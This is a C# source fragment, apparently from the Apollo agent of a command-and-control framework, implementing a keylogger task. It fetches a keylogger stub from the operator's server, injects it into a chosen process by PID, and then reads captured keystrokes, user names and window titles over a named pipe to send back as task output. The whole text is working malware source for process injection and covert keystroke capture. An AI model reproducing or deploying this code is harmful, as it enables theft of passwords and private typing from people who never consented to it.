private static void LogMessage(string title, string text)
{
//msgMutex.WaitOne();
if (title != lastTitle)
{
FlushMessage();
msg = new KeystrokeMessage()
{
User = WindowsIdentity.GetCurrent().Name,
WindowTitle = title,
Keystrokes = text
};
lastTitle = title;
}
else
{
msg.Keystrokes += text;
}
//msgMutex.ReleaseMutex();
}
public static void Execute(Job job, Agent implant)
{
Task task = job.Task;
byte[] loggerStub;
ApolloTaskResponse progressResp;
KeylogArguments args = JsonConvert.DeserializeObject <KeylogArguments>(task.parameters);
if (args.pid < 0)
{
job.SetError("PID must be non-negative.");
return;
}
if (string.IsNullOrEmpty(args.pipe_name))
{
job.SetError("No pipe was given to connect to.");
return;
}
if (string.IsNullOrEmpty(args.file_id))
{
job.SetError("No file ID was given to retrieve.");
return;
}
try
{
System.Diagnostics.Process.GetProcessById(args.pid);
} catch (Exception ex)
{
job.SetError($"Failed to find process with PID {args.pid}. Reason: {ex.Message}");
return;
}
loggerStub = implant.Profile.GetFile(job.Task.id, args.file_id, implant.Profile.ChunkSize);
if (loggerStub == null || loggerStub.Length == 0)
{
job.SetError("Failed to fetch keylogger stub from server.");
return;
}
var injectionType = Injection.InjectionTechnique.GetInjectionTechnique();
var injectionHandler = (Injection.InjectionTechnique)Activator.CreateInstance(injectionType, new object[] { loggerStub, (uint)args.pid });
//Injection.CreateRemoteThreadInjection crt = new Injection.CreateRemoteThreadInjection(loaderStub, (uint)pid);
if (injectionHandler.Inject())
{
BinaryFormatter bf = new BinaryFormatter();
bf.Binder = new IPC.KeystrokeMessageBinder();
NamedPipeClientStream pipeClient = new NamedPipeClientStream(".", args.pipe_name, PipeDirection.InOut);
try
{
pipeClient.Connect(30000);
job.OnKill = delegate()
{
try
{
if (pipeClient.IsConnected)
{
bf.Serialize(pipeClient, new IPC.KillLoggerMessage());
}
job.SetComplete("Stopped keylogger.");
}
catch (Exception ex)
{ }
};
job.AddOutput($"Connected to keylogger. Processing keystrokes.");
while (true)
{
KeystrokeMessage msg = new KeystrokeMessage();
try
{
msg = (IPC.KeystrokeMessage)bf.Deserialize(pipeClient);
ApolloTaskResponse resp = new ApolloTaskResponse()
{
task_id = task.id,
user = msg.User,
window_title = msg.WindowTitle,
keystrokes = msg.Keystrokes
};
job.AddOutput(resp);
}
catch (Exception ex)
{
}
}
} catch (Exception ex)
{
job.SetError($"Something went wrong: {ex.Message}");
}
}
}
